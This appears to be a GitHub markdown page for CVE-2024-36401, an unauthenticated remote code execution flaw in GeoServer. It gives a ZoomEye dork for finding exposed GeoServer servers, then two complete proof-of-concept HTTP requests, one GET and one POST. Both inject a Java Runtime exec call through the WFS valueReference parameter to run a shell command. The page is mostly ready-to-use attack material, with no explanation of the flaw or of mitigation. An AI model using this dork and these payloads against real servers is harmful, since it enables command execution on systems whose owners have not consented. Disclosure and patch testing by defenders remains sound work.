GeoServer Unauthenticated Remote Code Execution (CVE-2024-36401)

ZoomEye Dork

app:"GeoServer"

Link: https://www.zoomeye.hk/searchResult/report?q=app%3A%22GeoServer%22

POC

GET request POC

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0

POST request POC

POST /geoserver/wfs HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2024-36401.md

CVE-2024-36401.md

GeoServer Unauthenticated Remote Code Execution (CVE-2024-36401)

ZoomEye Dork

POC

Files

CVE-2024-36401.md

Latest commit

History

CVE-2024-36401.md

File metadata and controls

GeoServer Unauthenticated Remote Code Execution (CVE-2024-36401)

ZoomEye Dork

POC